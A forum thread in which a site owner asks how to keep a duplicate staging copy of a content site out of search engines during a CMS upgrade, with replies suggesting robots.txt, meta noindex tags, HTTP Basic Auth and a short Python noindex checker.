Creating a duplicate site for testing purposes - can it hurt the original site?
-
Hello,
We are soon going to upgrade our CMS to the latest version and add new functionality; the process may take anywhere from 4 to 6 weeks.
-
Please advise - since we need to work on the live server, here is what we have planned:
-
Take an exact replica of the site and move it to a test domain, but on the live server.
-
Block Google, Bing, and Yahoo via robots.txt on the test domain (note the crawlers identify themselves as Googlebot, Bingbot, and Slurp rather than by brand name): User-agent: Googlebot / Disallow: /, and likewise for Bingbot and Slurp.
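For reference, rather than listing the three engines individually, a simpler robots.txt on the test domain can disallow every well-behaved crawler in one rule. This is a sketch - the file goes in the test domain's document root, and it must never be deployed to the live site:

```
# robots.txt on the TEST domain only -- do not copy to the live site
User-agent: *
Disallow: /
```

A wildcard rule also covers crawlers beyond Google, Bing, and Yahoo, which a per-engine list would miss.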
-
Upgrade the CMS and add the new functionality, test the entire structure, check the URLs using Screaming Frog or Xenu, and then move on to configuring the site on the original domain.
The upgrade and new tools may take 1 to 1.5 months.
My concern: despite blocking Google, Bing, and Yahoo through user-agent disallow rules, can the URLs still be crawled by the search engines? If so, it may hurt the original site, since it would read as an entire duplicate. Or is there an alternate way around this? Many thanks.
-
-
Thanks - I'm using password protection and a meta noindex tag.
It's been kept out of the search engine crawl!
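For anyone following along, password protection on an Apache server is usually done with HTTP Basic Auth in the staging site's .htaccess. A minimal sketch - the paths and realm name here are illustrative, and this assumes the test site runs Apache:

```
# .htaccess in the staging site's document root (paths are illustrative)
AuthType Basic
AuthName "Staging - authorized users only"
AuthUserFile /home/example/.htpasswd
Require valid-user
```

The credentials file is created with `htpasswd -c /home/example/.htpasswd username`. Crawlers cannot authenticate, so this keeps the staging content out of the index regardless of robots.txt.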
-
Hey Gagan,
So I think your question is: will content on your staging site still get indexed despite using robots.txt? The answer is yes - sometimes that does happen, especially if a lot of people link to it. The best way to keep content out of the index is to use the meta robots tag with noindex, nofollow. Search engines are much better about adhering to those than to robots.txt.
Let us know if you run into any problems!
-Mike
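One way to sanity-check that every staging page actually carries the tag Mike recommends is to parse the HTML and look for a robots meta directive containing noindex. A minimal sketch using only Python's standard library - the function and class names are illustrative, not from any particular tool:

```python
from html.parser import HTMLParser

class RobotsMetaParser(HTMLParser):
    """Collects the content of any <meta name="robots"> tag."""
    def __init__(self):
        super().__init__()
        self.directives = []

    def handle_starttag(self, tag, attrs):
        if tag == "meta":
            a = dict(attrs)
            if a.get("name", "").lower() == "robots":
                self.directives.append((a.get("content") or "").lower())

def is_noindexed(html: str) -> bool:
    """True if the page declares noindex in a robots meta tag."""
    parser = RobotsMetaParser()
    parser.feed(html)
    return any("noindex" in d for d in parser.directives)

# Example: a staging page carrying the recommended tag
page = ('<html><head>'
        '<meta name="robots" content="noindex, nofollow">'
        '</head><body>staging</body></html>')
print(is_noindexed(page))  # → True
```

Running this over a crawl of the test domain (e.g. a URL list exported from Screaming Frog) would flag any staging page missing the tag before it can leak into the index.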
-
Hi Gagan,
Google are generally more than happy for sites to test new pages, layouts and functionality. They even have some free tools for that purpose.
Content Experiments
https://support.google.com/analytics/answer/1745147?ref_topic=1745207&rd=1
I'm not sure about the viability of using Content Experiments to test a whole new site, but it would be worth looking into.
Let us know how you get on.
Neil.
-
Aha - thanks, Robert, for your views.
However, can any kind of duplicate URL issue still occur? Can Google still crawl the URLs despite their being blocked through robots.txt? And can the original running site suffer in any way if we create a duplicate site?
It's a content-based site covering auto reviews, news updates, and forum & blog updates. There is no ecommerce shopping or products involved.
Our tentative time frame to add features, test all changes, and do the major upgrade to the latest version of the CMS is approximately 45 days. Do you foresee any issue if both the original site and a duplicate on a test domain (despite being blocked by robots.txt) run simultaneously on the live server for that period?
Also - you referred to other ways of testing changes; would it be possible to share them?
-
Gagan
I think this is a great and interesting question. First, you are adding functionality, etc. to a site and you are curious as to the effect of that on visitors to the site once they are on it. This is data anyone in SEO should want to see for their sites.
I would first say that you need to define the test period (assuming you already know what you want to measure) for the site. If it is a week, for example, I do not think you need to worry about whether a site with the three major engines blocked will in some way run into duped-content issues. (NOTE: If this is a large site and/or one with a critical revenue need - one that cannot afford any kind of slight but temporary downturn - I would look for another way to test the changes, even if I were sure there were no other issues.)
I am assuming that if this were an ecommerce site, for example, shoppers would be able to purchase on both, etc.
I would not run the test for any long period of time for a site that creates leads, revenue, etc. as I think it could cause customer confusion which can be more critical than duped content.
Let us know how it works out,
Thanks